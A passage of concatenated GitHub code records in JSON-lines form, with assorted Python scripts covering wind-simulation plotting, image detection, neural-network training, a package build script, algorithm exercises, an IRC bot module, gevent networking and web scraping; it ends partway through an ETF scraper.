case_ws_wrf_data.DY\n #print('DX: {}, DY: {}, DZ: {}'.format(DX, DY, DZ))\n\n slice_data1_U = extract_slices_from_tsout_file (case_ws_ts_data, 'UTS', z_ind1, time_ind)\n slice_data1_V = extract_slices_from_tsout_file (case_ws_ts_data, 'VTS', z_ind1, time_ind)\n slice_data1_UMAG = compute_u_mag_for_slice (slice_data1_U, slice_data1_V)\n\n slice_data2_U = extract_slices_from_tsout_file (case_ws_ts_data, 'UTS', z_ind2, time_ind)\n slice_data2_V = extract_slices_from_tsout_file (case_ws_ts_data, 'VTS', z_ind2, time_ind)\n slice_data2_UMAG = compute_u_mag_for_slice (slice_data2_U, slice_data2_V)\n\n slice_data_wgt_UMAG = w1*slice_data1_UMAG + w2*slice_data2_UMAG\n \n return slice_data_wgt_UMAG, DX, DY\n \n \n# In[]:\ndef get_hub_height_slice_data_in_case_data_map (case_dir_map, WRF_result_base_loc, ws, \\\n outfile, tsoutfile, time_ind):\n for case in case_dir_map.keys():\n z_ind1 = case_dir_map[case]['z_indices'][0]\n z_ind2 = case_dir_map[case]['z_indices'][1]\n w1 = case_dir_map[case]['weights'][0]\n w2 = case_dir_map[case]['weights'][1]\n #print('z_indices: [{}, {}], weights: [{}, {}]'.format(z_ind1, z_ind2, w1, w2))\n\n slice_data_wgt_UMAG, DX, DY = \\\n get_hub_height_slice_data_case_ws (WRF_result_base_loc, case, ws, outfile, tsoutfile, \\\n time_ind, z_ind1, z_ind2, w1, w2)\n \n case_dir_map[case]['slice_data'] = slice_data_wgt_UMAG\n case_dir_map[case]['DX'] = DX\n case_dir_map[case]['DY'] = DY\n \n return case_dir_map\n\n# In[]:\ndef plot_hub_height_slice_data_all_cases_separately (case_dir_map, GAD_param_slice_loc, slice_dir, \\\n ws, cont_levels_count, qoi_cont_range, \\\n xlim, ylim):\n for case in case_dir_map.keys():\n case_legend = case_dir_map[case]['legend']\n\n slice_data_wgt_UMAG = case_dir_map[case]['slice_data']\n DX = case_dir_map[case]['DX']\n DY = case_dir_map[case]['DY']\n\n plot_loc = os.path.join(GAD_param_slice_loc, slice_dir, 'power_curve_{}'.format(ws))\n os.system('mkdir -p %s'%plot_loc)\n image_name = 'slice_{}_{}.png'.format(case, 'UMAG')\n\n plot_contour_slice(slice_data_wgt_UMAG, DX, DY, plot_loc, image_name, \\\n 'UMAG', 'UMAG', 'm/s', case_legend, \\\n cont_levels_count, qoi_cont_range, xlim, ylim)\n","repo_name":"pkjha-aero/AlphaVentus","sub_path":"GAD_Param_Study/helper_GAD.py","file_name":"helper_GAD.py","file_ext":"py","file_size_in_byte":10481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"315712436","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom PIL import Image\r\nimport os\r\nimport cv2\r\nimport time\r\nimport numpy as np\r\nfrom keras_retinanet import models\r\nfrom keras_retinanet.utils.image import read_image_bgr, preprocess_image\r\nfrom keras_retinanet.utils.visualization import draw_box, draw_caption\r\nfrom keras_retinanet.utils.colors import label_color\r\n\r\n# 获取文件夹中的文件路径\r\nimport os\r\ndef get_filePathList(dirPath, partOfFileName=''):\r\n allFileName_list = list(os.walk(dirPath))[0][2]\r\n fileName_list = [k for k in allFileName_list if partOfFileName in k]\r\n filePath_list = [os.path.join(dirPath, k) for k in fileName_list]\r\n return filePath_list\r\n \r\n# 检测单张图片,返回画框后的图片\r\ndef get_detectedImage(retinanet_model, imageFilePath):\r\n labels_to_names = {0:'fish', 1:'human_face'}\r\n startTime = time.time()\r\n image = read_image_bgr(imageFilePath)\r\n new_size = (416, 416) \r\n image = cv2.resize(image, new_size, interpolation=cv2.INTER_LANCZOS4) \r\n draw = image.copy()\r\n draw = cv2.cvtColor(draw, cv2.COLOR_BGR2RGB)\r\n image = preprocess_image(image)\r\n boxes, scores, labels = retinanet_model.predict_on_batch(np.expand_dims(image, axis=0))\r\n for box, score, label in zip(boxes[0], scores[0], labels[0]):\r\n if score < 0.5:\r\n break\r\n color = label_color(label)\r\n b = box.astype(int)\r\n draw_box(draw, b, color=color)\r\n caption = \"{} {:.3f}\".format(labels_to_names[label], score)\r\n draw_caption(draw, b, caption)\r\n usedTime = time.time() - startTime\r\n print(\"检测这张图片用时%.2f秒\" %usedTime)\r\n return draw\r\n\r\n# 对若干图片做目标检测\r\ndef detect_images(modelFilePath, imageFilePath_list, out_mp4FilePath=None):\r\n retinanet_model = models.load_model(modelFilePath, backbone_name='resnet50')\r\n cv2.namedWindow('result', cv2.WINDOW_NORMAL)\r\n width = 1000\r\n height = 618\r\n size = (width, height)\r\n cv2.resizeWindow('result', width, height)\r\n if out_mp4FilePath is not None:\r\n fourcc = cv2.VideoWriter_fourcc('M', 'P', 'E', 'G')\r\n videoWriter = cv2.VideoWriter(out_mp4FilePath, fourcc, 1.7, size)\r\n for imageFilePath in imageFilePath_list:\r\n out_image_ndarray = get_detectedImage(retinanet_model, imageFilePath)\r\n resized_image_ndarray = cv2.resize(out_image_ndarray, size, interpolation=cv2.INTER_LANCZOS4) \r\n # 图片第1维是宽,第2维是高,第3维是RGB\r\n # PIL库图片第三维是RGB,cv2库图片第三维正好相反,是BGR\r\n cv2.imshow('result', resized_image_ndarray[...,::-1])\r\n time.sleep(0.4)\r\n if out_mp4FilePath is not None:\r\n videoWriter.write(resized_image_ndarray[...,::-1])\r\n if cv2.waitKey(1) and 0xFF == 27:\r\n break\r\n cv2.destroyAllWindows()\r\n\r\n# 解析运行代码文件时传入的参数\r\nimport argparse\r\ndef parse_args():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-d', '--dirPath', type=str, help='directory path', default='./n01440764') \r\n parser.add_argument('-s', '--suffix', type=str, default='.JPEG')\r\n parser.add_argument('-m', '--modelFilePath', type=str, default='./retinanet_inference.h5')\r\n parser.add_argument('-o', '--out_mp4FilePath', type=str, default='fish_output.avi')\r\n argument_namespace = parser.parse_args()\r\n return argument_namespace \r\n\r\n# 主函数 \r\nif __name__ == '__main__':\r\n argument_namespace = parse_args()\r\n dirPath = argument_namespace.dirPath\r\n suffix = argument_namespace.suffix\r\n modelFilePath = argument_namespace.modelFilePath\r\n out_mp4FilePath = argument_namespace.out_mp4FilePath\r\n imageFilePath_list = get_filePathList(dirPath, suffix)\r\n detect_images(modelFilePath, imageFilePath_list, out_mp4FilePath)","repo_name":"ronnieblanc/keras_RetinaNet","sub_path":"06_detectImages.py","file_name":"06_detectImages.py","file_ext":"py","file_size_in_byte":3834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34146341499","text":"import numpy as pd\nfrom numpy import ndarray\nimport matplotlib.pyplot as plt\nfrom keras.utils import np_utils\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\n\n\n# Load the dataset\n(features_train, labels_train), (features_test, labels_test) = mnist.load_data()\n\n# Plot 4 Images as gray scale\nfor i in range(4):\n plt.subplot(221 + i)\n plt.imshow(features_train[i], cmap=plt.get_cmap('gray'))\n\nplt.show()\n\n# Preprocess the dataset\nnum_pixels = features_train.shape[1] * features_train.shape[2]\nfeatures_train = features_train.reshape(features_train.shape[0], num_pixels).astype('float32')\nfeatures_test = features_test.reshape(features_test.shape[0], num_pixels).astype('float32')\n\n# Scale the inputs\nfeatures_train = features_train / 255\nfeatures_test = features_test / 255\n\n# One hot encode the output\nlabels_train = np_utils.to_categorical(labels_train)\nlabels_test = np_utils.to_categorical(labels_test)\nnum_classes = labels_test.shape[1]\n\n# Build the model\nmodel = Sequential()\nmodel.add(Dense(1000, input_dim=num_pixels, activation='relu'))\nmodel.add(Dense(num_classes, activation='softmax'))\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\nmodel.summary()\n\n# Run the model\nmodel.fit(features_train, labels_train, validation_data=(features_test, labels_test), epochs=5, batch_size=1024, verbose=1)","repo_name":"aleksandar-aleksandrov/machine-learning","sub_path":"Pro Machine Learning Algorithms/Chapter 7/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10199030848","text":"# Program to flatten a list using recursions. Input list can contain any levels of sub-lists\r\n\r\ndef ex15(arr):\r\n # empty than return\r\n if not arr:\r\n return arr\r\n # check if list than call function again\r\n if type(arr[0]) is list:\r\n return ex15(*arr[:1]) + ex15(arr[1:])\r\n return arr[:1] + ex15(arr[1:])\r\n\r\n# Run the function for given input\r\nip=[1,2,3,4,5, [10,20,30,4,50,60,100],90,200,[300,10]]\r\nprint(ex15(ip))","repo_name":"sudh29/Trainings","sub_path":"ex15.py","file_name":"ex15.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3002398443","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.template import loader\nfrom app_MVT_Matias_Puletti.models import Familia\n# Create your views here.\n\n\ndef datos_familia(request):\n template=loader.get_template('familia_template.html')\n model = Familia(nombre_familiar=True, edad_familiar= edad_familiar, nacimiento_familiar= nacimiento_familiar)\n model.save()\n render=template.render({'model': model})\n \n return HttpResponse(render)\n\n\ndef listado_familia(request):\n template=loader.get_template('familia_template.html')\n lista_familia = Familia.objects.all()\n render=template.render({'lista_familia': lista_familia})\n return HttpResponse(render)\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"MatiasBran/MVT-Matias_Puletti","sub_path":"app_MVT_Matias_Puletti/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23515372728","text":"import subprocess\nfrom pathlib import Path\nimport platform\nimport sys\nfrom itertools import chain\nfrom distutils.command.build_py import build_py as _build_py\nfrom distutils.command.clean import clean as _clean\n\nimport shutil\nfrom setuptools import setup, Extension, find_packages\nfrom setuptools.command.build_ext import build_ext as _build_ext\nfrom setuptools.command.install import install as _install\n\nIS_WINDOWS = (platform.system() == 'Windows')\nIS_DARWIN = (platform.system() == 'Darwin')\nIS_LINUX = (platform.system() == 'Linux')\n\nREQUIREMENTS_FILE = 'requirements.txt'\nPACKAGE_NAME = 'inference_engine'\n\nPACKAGE = Path(PACKAGE_NAME)\nC_LIB_NAME = '{}._C'.format(PACKAGE_NAME)\n\n_build_cmd = ['cmake', '--build', '.']\n\nINFERENCE_ENGINE_DIR = None\nBUNDLE_INFERENCE_ENGINE = False\n\n\ndef parse_command_line_options(cls):\n \"\"\"Propagates command line options to sub-commands.\n Allows to run install command with build_ext options\"\"\"\n\n base_user_options = getattr(cls, 'user_options', [])\n base_boolean_options = getattr(cls, 'boolean_options', [])\n base_run = cls.run\n base_init_options = cls.initialize_options\n\n cls.user_options = base_user_options + [\n ('copy-ie-libs', None, 'Copy Inference Engine Libraries to package directory'),\n ('inference-engine-dir=', None, 'Path to Inference Engine directory')\n ]\n\n cls.boolean_options = base_boolean_options + [\n 'copy-ie-libs'\n ]\n\n def initialize_options(self):\n self.copy_ie_libs = False\n self.inference_engine_dir = None\n base_init_options(self)\n\n def run(self):\n global INFERENCE_ENGINE_DIR\n global BUNDLE_INFERENCE_ENGINE\n\n if self.copy_ie_libs:\n BUNDLE_INFERENCE_ENGINE = True\n\n if self.inference_engine_dir:\n INFERENCE_ENGINE_DIR = self.inference_engine_dir\n\n base_run(self)\n\n cls.initialize_options = initialize_options\n cls.run = run\n return cls\n\n\n@parse_command_line_options\nclass install(_install):\n pass\n\n\n@parse_command_line_options\nclass build_py(_build_py):\n pass\n\n\n@parse_command_line_options\nclass build_ext(_build_ext):\n def run(self):\n if not self.extensions:\n return\n\n for i, ext in enumerate(self.extensions):\n if ext.name == C_LIB_NAME:\n self._build_cmake()\n self.extensions.pop(i)\n break\n\n super().run()\n\n def _build_cmake(self):\n print(\"Building C++ extension\")\n if Path.cwd().joinpath(\"Makefile\").is_file():\n # in build directory, run make only\n subprocess.call(_build_cmd)\n else:\n # compile extension library and\n self.build_cmake_lib()\n print(\"Built C++ extension\")\n\n def build_cmake_lib(self):\n def save_call(*args, error_msg=None, **kwargs):\n if subprocess.call(*args, **kwargs) != 0:\n if error_msg:\n print(error_msg)\n shutil.rmtree(tmp_build_dir.as_posix(), ignore_errors=True)\n sys.exit(1)\n\n tmp_build_dir = Path(\"tmp_build\")\n destination = Path(self.build_lib) / PACKAGE_NAME if not self.inplace else Path(PACKAGE_NAME)\n tmp_build_dir.mkdir(exist_ok=False)\n\n _python_executable_opt = ['-DPYTHON_EXECUTABLE={}'.format(sys.executable)]\n _build_type_opt = ['-DCMAKE_BUILD_TYPE=Release']\n _generator_opt = ['-G', 'NMake Makefiles' if IS_WINDOWS else \"Unix Makefiles\"]\n\n _optional = []\n if BUNDLE_INFERENCE_ENGINE:\n _optional.append('-DCOPY_IE_LIBS=ON')\n\n if INFERENCE_ENGINE_DIR:\n _optional.append('-DInferenceEngine_DIR={}'.format(INFERENCE_ENGINE_DIR))\n\n _cmake_cmd = list(chain(['cmake'], _generator_opt, _build_type_opt, _python_executable_opt, _optional, ['..']))\n\n save_call(_cmake_cmd, cwd=tmp_build_dir.as_posix(), error_msg=\"Cmake generator failed\")\n save_call(_build_cmd, cwd=tmp_build_dir.as_posix(), error_msg=\"Build command failed\")\n\n build_ext.copy_compiled_libs(tmp_build_dir / PACKAGE_NAME, destination)\n shutil.rmtree(tmp_build_dir.as_posix(), ignore_errors=False)\n\n @staticmethod\n def copy_compiled_libs(source_dir, destination):\n extensions = ['so', 'dll', 'pyd']\n for path in chain.from_iterable(source_dir.glob(\"*.%s\" % ext) for ext in extensions):\n shutil.copy(path.as_posix(), destination.as_posix())\n\n\nclass clean(_clean):\n def run(self):\n shutil.rmtree(\"tmp_build\", ignore_errors=True)\n extensions = ['so', 'dll', 'pyd']\n for path in chain.from_iterable(PACKAGE.glob(\"*.%s\" % ext) for ext in extensions):\n path.unlink()\n super().run()\n\n\ndef paths_to_str(paths):\n return [p.as_posix() for p in paths]\n\n\nwith open(REQUIREMENTS_FILE) as reqs:\n requirements = set(reqs.read().splitlines())\n\n# do not spoil pre-installed opencv (in case it was built from source)\n_opencv_package = \"opencv-python\"\ntry:\n import cv2\n\n if _opencv_package in requirements:\n requirements.remove(_opencv_package)\nexcept ImportError:\n requirements.add(_opencv_package)\n\n\nc_sources = [\n PACKAGE / 'ie_driver.cpp',\n PACKAGE / 'ie_driver.hpp',\n\n PACKAGE / 'c_ie_driver.pxd',\n PACKAGE / 'ie_driver.pyx',\n PACKAGE / 'ie_driver.pxd',\n]\n\nextensions = [\n Extension(C_LIB_NAME, paths_to_str(c_sources))\n]\n\ncmdclass = {\n 'build_ext': build_ext,\n 'build_py': build_py,\n 'clean': clean,\n 'install': install,\n}\n\nsetup(\n name=\"src\",\n version='1.0',\n description='Python inference for Inference Engine',\n packages=find_packages(exclude=['tests']),\n package_data={PACKAGE_NAME: ['*.so', '*.dll', '*dylib*', '*.pyd']},\n include_package_data=True,\n ext_modules=extensions,\n cmdclass=cmdclass,\n install_requires=list(requirements),\n zip_safe=False,\n)\n","repo_name":"pc2/CustoNN2","sub_path":"dldt/inference-engine/ie_bridges/python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":5880,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"3122703312","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def binaryTreePaths(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[str]\n \"\"\"\n stack = [(root,\"\")]\n res = []\n if not root:\n return res\n while stack:\n t = stack.pop()\n node = t[0]\n strr = t[1]\n if not node.left and not node.right:\n res.append(strr + str(node.val))\n if node.left:\n stack.append((node.left,strr + str(node.val) + \"->\"))\n if node.right:\n stack.append((node.right,strr + str(node.val) + \"->\"))\n return res\n","repo_name":"tr1503/LeetCode","sub_path":"Depth First Search/binaryTreePaths.py","file_name":"binaryTreePaths.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18180900982","text":"from decouple import config\nimport requests\n\n\n# Convert search term to url dynamically\ndef search_to_url(search):\n # Split search string into seperate words\n search_spliced = search.split()\n\n # Length of string\n length_search_splice = len(search_spliced)\n\n # Declare empty variable string for new url\n raw_url_bridge_beg = \"\"\n\n # Loop through each word and concatenate to empty string variable declared in previous step\n for i, word in enumerate(search_spliced):\n # If not last word in search string, add lowercased word to string and a plus afterwards\n if i != (length_search_splice - 1):\n raw_url_bridge_beg += word.lower() + \"+\"\n # If is last word, add only lowercased word to string wihthout +\n else:\n raw_url_bridge_beg += word.lower()\n\n raw_url_start = config(\"RAW_URL_START\")\n raw_url_bridge_final = raw_url_bridge_beg\n raw_url_end = config(\"RAW_URL_END\")\n\n # Concatenate start, string variable we created and end of url to final url and return to bottle_bot.py \n final_url = raw_url_start + raw_url_bridge_final + raw_url_end\n\n return final_url\n\n\n# Check if scrapped bottle matches users requested search criteria\ndef name_filter_auto(bottle_search, bottle_input_new):\n if bottle_search.title() == bottle_input_new:\n return True\n else:\n return False\n\n\ndef slugify(text):\n slug = \"\"\n for letter in text.lower():\n if letter.isalnum():\n slug += letter\n elif letter == \" \":\n slug += \"+\"\n return slug\n\n\ndef convert():\n endpoint = \"https://cdn.jsdelivr.net/gh/fawazahmed0/currency-api@1/latest/currencies/gbp.json\"\n response = requests.get(endpoint)\n data = response.json()\n print(data[\"gbp\"][\"usdt\"])\n return data[\"gbp\"][\"usdt\"]\n\n\n","repo_name":"anpythomas/booggle_deploy","sub_path":"valuator/operations/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17491599326","text":"# coding: UTF-8\nimport os\n\n\ndef set_requires_grad(nets, requires_grad=False):\n if not isinstance(nets, list):\n nets = [nets]\n for net in nets:\n if net is None:\n continue\n for param in net.parameters():\n param.requires_grad = requires_grad\n\n\ndef save_args(log_dir, args):\n fpath = os.path.join(log_dir, 'args.txt')\n with open(fpath, 'w') as f:\n f.writelines(\n ['{}: {}\\n'.format(arg, getattr(args, arg))\n for arg in dir(args) if not arg.startswith('_')])\n os.system('cat {}'.format(fpath))\n","repo_name":"fujiki-1emon/CycleGAN.repro","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30146402887","text":"\"\"\"\r\n\n\nCreate a function that takes a number `n` as an argument and checks whether\nthe given number can be expressed as a sum of **two or more consecutive\npositive numbers**.\n\n### Examples\n\n consecutiveSum(9) ➞ True\n # 9 can be expressed as a sum of (2 + 3 + 4) or (4 + 5).\n \n consecutiveSum(10) ➞ True\n # 10 can be expressed as a sum of 1 + 2 + 3 + 4.\n \n consecutiveSum(64) ➞ False\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef consecutive_sum(n):\n total = 0\n for i in range(n):\n total += i\n for j in range(i+1,n):\n if total > n:\n total = 0\n break\n if total == n:\n return True\n total += j\n return False\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"srEFhCNueikMKs3oT_18.py","file_name":"srEFhCNueikMKs3oT_18.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28425499596","text":"import random\nimport re\n\nfrom twisted.plugin import IPlugin\nfrom zope.interface import implementer\n\nfrom desertbot.message import IRCMessage\nfrom desertbot.moduleinterface import IModule, BotModule, ignore\nfrom desertbot.response import IRCResponse\n\n\n@implementer(IPlugin, IModule)\nclass Animals(BotModule):\n def actions(self):\n return super(Animals, self).actions() + [('message-channel', 1, self.respond),\n ('message-user', 1, self.respond),\n ('action-channel', 1, self.respond),\n ('action-user', 1, self.respond)]\n\n def help(self, arg):\n return 'Responds to animal noises.'\n\n def onLoad(self) -> None:\n defaultReactions = {\n \"1\": \"{user} critically fails at being {article} {animal}.\",\n \"8\": \"{user} is not {article} {animal}.\",\n \"14\": \"{user} /might/ be {article} {animal}.\",\n \"19\": \"{user} is DEFINITELY {article} {animal}.\",\n \"20\": \"{user} is a CRITICAL {animal}!\"\n }\n self.animalResponses = self.storage[\"animals\"]\n self.animalReactions = dict(self.storage[\"animalCustomReactions\"]) # copy stored dict so we can extend with defaultReactions\n for _, animalName in self.animalResponses.items():\n if animalName not in self.animalReactions:\n self.animalReactions[animalName] = dict(defaultReactions)\n\n @ignore\n def respond(self, message: IRCMessage) -> IRCResponse:\n for match, animal in self.animalResponses.items():\n if re.search(r'^{}([^\\s\\w]+)?$'.format(match), message.messageString, re.IGNORECASE):\n # roll a d20\n roll = random.randint(1, 20)\n\n # construct animal reaction based on roll\n reactions = self.animalReactions[animal]\n # toungue-in-cheek default response, in case of Math Weirdness\n reaction = \"{user} broke the animal responder, they're CLEARLY a magician!\"\n # check each roll range and its matching reaction, which one do we want for the current roll?\n for rollMax, reactionCandidate in reactions.items():\n if roll == int(rollMax):\n # rolled exactly equal to one of the range maximums, this candidate is our wanted response\n reaction = reactionCandidate\n break\n elif roll > int(rollMax):\n # rolled higher than this range maximum, try next one\n continue\n else:\n # rolled lower than this range maximum, but higher than a previous one, this candidate is our wanted response\n reaction = reactionCandidate\n break\n\n article = \"an\" if animal[0] in 'aeiou' else \"a\"\n # the reaction has placeholders, fill them out\n reaction = reaction.format(user=message.user.nick, article=article, animal=animal)\n\n return IRCResponse(reaction, message.replyTo)\n\n\nanimals = Animals()\n","repo_name":"DesertBot/DesertBot","sub_path":"desertbot/modules/automatic/Animals.py","file_name":"Animals.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"12504094555","text":"import gevent\n\nfrom gevent.event import Event\nfrom gevent.server import StreamServer\nfrom gevent.socket import create_connection\nfrom gevent.queue import Queue\nfrom gevent import socket\n\nfrom twiggy import log; logger = log.name(__name__)\n\nclass DisconnectedException(Exception):\n \"\"\"\n Exception thrown when session gets disconnected, used to stop loops\n \"\"\"\n\n pass\n\nclass Session(object):\n \"\"\"\n Base class for network connections (sessions)\n \"\"\"\n\n # Method to call when a packet arrives\n # if None don't call\n packetHandler = None\n\n def __init__(self, socket = None, address = None):\n \"\"\"\n Initialize a `Session`\n\n :socket: Socket to use for this session\n :address: Address the socket is connected to/from\n \"\"\"\n\n self.sendQueue = Queue()\n\n self.recvGreenlet = None\n self.sendGreenlet = None\n self.finished = Event()\n\n self.cleanExit = False\n\n self.socket = socket\n self.address = address\n\n self.log = logger.name(\"session\") \\\n .fields(host = address[0], port = address[1])\n\n def _sendPacket(self, packet):\n \"\"\"\n Send a packet, writing it to the socket\n\n `_sendLoop` will stop if this does not return True\n \"\"\"\n\n try:\n self.log.debug(\"Sending packet: {}\", packet)\n self.socket.sendall(\"{}\\n\".format(packet))\n self.log.debug(\"Sent packet: {}\", packet)\n except socket.error as e:\n # If an error occurs put packet back on the queue\n self.log.error(\"_sendPacket error: {}\", e)\n self.disconnect()\n self.sendQueue.put(packet)\n return False\n\n return True\n\n def _sendLoop(self):\n \"\"\"Loop for sending packets\"\"\"\n\n self.log.debug(\"Starting send loop...\")\n\n try:\n while True:\n packet = self.sendQueue.get()\n if not self._sendPacket(packet):\n break\n except DisconnectedException:\n self.log.debug(\"_sendLoop killed\")\n finally:\n self.log.debug(\"Send loop stopped\")\n\n def send(self, packet):\n \"\"\"\n Send a packet.\n\n Queues the packet to be sent out as soon as possible.\n\n :packet: Packet to send\n \"\"\"\n\n self.log.debug(\"Queueing packet: {}\", packet)\n self.sendQueue.put(packet)\n\n def _recvPacket(self, packet):\n \"\"\"\n Internal method for receiving a packet\n\n :packet: Packet received\n \"\"\"\n packet = packet[:-1] # Remove trailing newline\n\n self.log.debug(\"Packet received: {}\", packet)\n\n if self.packetHandler:\n self.packetHandler(packet)\n\n def _recvLoop(self):\n \"\"\"Loop for receiving packets\"\"\"\n\n self.log.debug(\"Starting recv loop...\")\n sockfile = self.socket.makefile()\n\n while True:\n try:\n packet = sockfile.readline()\n except socket.error as e:\n self.log.error(\"_recvLoop, exception: {}\", e)\n self.disconnect()\n break\n\n # Stop if packet is None\n if not packet:\n break\n\n self._recvPacket(packet)\n\n # Only error level if not clean exit\n if not self.cleanExit:\n self.log.error(\"Connection lost\")\n else:\n self.log.debug(\"Socket disconnected\")\n\n self.onDisconnect()\n self.log.debug(\"Recv loop stopped\")\n\n def start(self):\n \"\"\"Starts the recv and send loops\"\"\"\n\n self.log.debug(\"Starting session loops\")\n\n self.recvGreenlet = gevent.spawn(self._recvLoop)\n self.sendGreenlet = gevent.spawn(self._sendLoop)\n\n def disconnect(self):\n \"\"\"Cleanly disconnect the connection\"\"\"\n\n self.log.debug(\"Disconnecting...\")\n\n self.cleanExit = True\n self.socket.close()\n\n self.finished.set()\n\n def onDisconnect(self):\n \"\"\"Method called on disconnect\"\"\"\n\n self.sendGreenlet.kill(DisconnectedException)\n\n self.recvGreenlet = None\n self.sendGreenlet = None\n\nclass ServerSession(Session):\n \"\"\"\n Server specific implementation of a `Session`\n \"\"\"\n\n def __init__(self, server, socket, address):\n \"\"\"\n Initialize `ServerSession`\n\n :server: Server this connection is spawned from\n\n For more info see `Session.__init__`\n \"\"\"\n\n self.server = server\n\n Session.__init__(self, socket, address)\n\n def _recvLoop(self):\n \"\"\"Modified `_recvLoop` to let the `Server` handle disconnects properly\"\"\"\n\n Session._recvLoop(self)\n self.server.handleDisconnect(self)\n\nclass Server(object):\n \"\"\"\n Listens for incoming connections and keeps track of active sessions\n \"\"\"\n\n # What to use as session factory\n session = ServerSession\n\n def __init__(self, port):\n \"\"\"\n Initialize the `Server`\n\n :port: Port to listen on\n \"\"\"\n\n self.port = port\n self.server = StreamServer((\"0.0.0.0\", port), self.handleConnect)\n self.serverGreenlet = None\n\n self.sessions = set()\n\n self.log = logger.name(\"server\") \\\n .fields(port = port)\n\n def listen(self):\n \"\"\"Start listening\"\"\"\n\n self.serverGreenlet = gevent.spawn(self.server.serve_forever)\n self.log.info(\"Started listening on port {}\", self.port)\n\n def handleConnect(self, socket, address):\n \"\"\"\n Handle a new connection\n\n :socket: Socket object for the connection\n :address: (ip, port) tuple of the remote client\n \"\"\"\n\n self.log.info(\"Client connected from {}:{}\", address[0], address[1])\n\n session = self.session(self, socket, address)\n session.start()\n\n # Add session to active sessions\n self.sessions.add(session)\n\n def handleDisconnect(self, session):\n \"\"\"\n Handle a client disconnecting\n\n :session: Session of the client that disconnected\n \"\"\"\n\n # Remove session from active sessions\n self.sessions.remove(session)\n\n def sendAll(self, packet):\n \"\"\"\n Send a packet to all sessions\n\n :packet: Packet to send\n \"\"\"\n\n for session in self.sessions:\n session.send(packet)\n\nclass Client(Session):\n \"\"\"Client specific extension to `Session` including reconnect\"\"\"\n\n # How long to wait between reconnect intervals\n retryInterval = 5\n\n def __init__(self, address):\n \"\"\"\n Initialize the client\n\n :address: (host, port) tuple to connect to\n \"\"\"\n\n Session.__init__(self, address = address)\n\n def connect(self):\n \"\"\"Connect to a server\"\"\"\n\n # Reset `cleanExit`\n self.cleanExit = False\n\n # Keep retrying the connection\n while True:\n try:\n self.socket = create_connection(self.address, 2)\n break\n except socket.error as e:\n self.log.debug(\"Connect failed ({}), retrying in {} seconds\",\n e, self.retryInterval\n )\n gevent.sleep(self.retryInterval)\n\n self.start()\n\n def _recvLoop(self):\n \"\"\"Modified `_recvLoop` to implement automatic reconnecting\"\"\"\n\n Session._recvLoop(self)\n self.connect()\n","repo_name":"thegeekoftheworld/xstats","sub_path":"xstats/daemon/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":7404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"36167545650","text":"# Solution: 전체가 몇일 인지 구한 뒤, 날짜 수를 이용해 계산\n\ninputdata=input().split()\n\nx=int(inputdata[0])\ny=int(inputdata[1])\n\ntotalday=[31,28,31,30,31,30,31,31,30,31,30,31]\n\ntotal=y\n\n#Total date calculate\nif x!=1:\n for i in range(x-1):\n total=total+totalday[i]\n\nrest=total%7\nif rest==1:\n print('MON')\nelif rest==2:\n print('TUE')\nelif rest==3:\n print('WED')\nelif rest==4:\n print('THU')\nelif rest==5:\n print('FRI')\nelif rest==6:\n print('SAT')\nelse:\n print('SUN')\n","repo_name":"golony6449/Algo_train","sub_path":"boj/1924.py","file_name":"1924.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21262086087","text":"import requests\nimport pandas as pd\nfrom bs4 import BeautifulSoup as bs\nfrom bs4 import BeautifulSoup\nimport datetime\nimport os\nimport random\nimport json\n\nr = requests.get(\"https://stockanalysis.com/etf/\", headers={\"User-Agent\":\"Mozilla/5.0\"})\nsoup2 = BeautifulSoup(r.text,\"html.parser\")\nscript = soup2.find(\"script\",{\"id\":\"__NEXT_DATA__\"})\na1 = json.loads(soup2.find_all(\"script\")[4].string)[1]\netf_symbols = pd.DataFrame(a1[\"data\"]).s.to_list()\n \n# Not sure if some dont update due to times. Add shuffle to randomly loop.\nrandom.shuffle(etf_symbols)\n# This ensures that at least spy and qqq runs 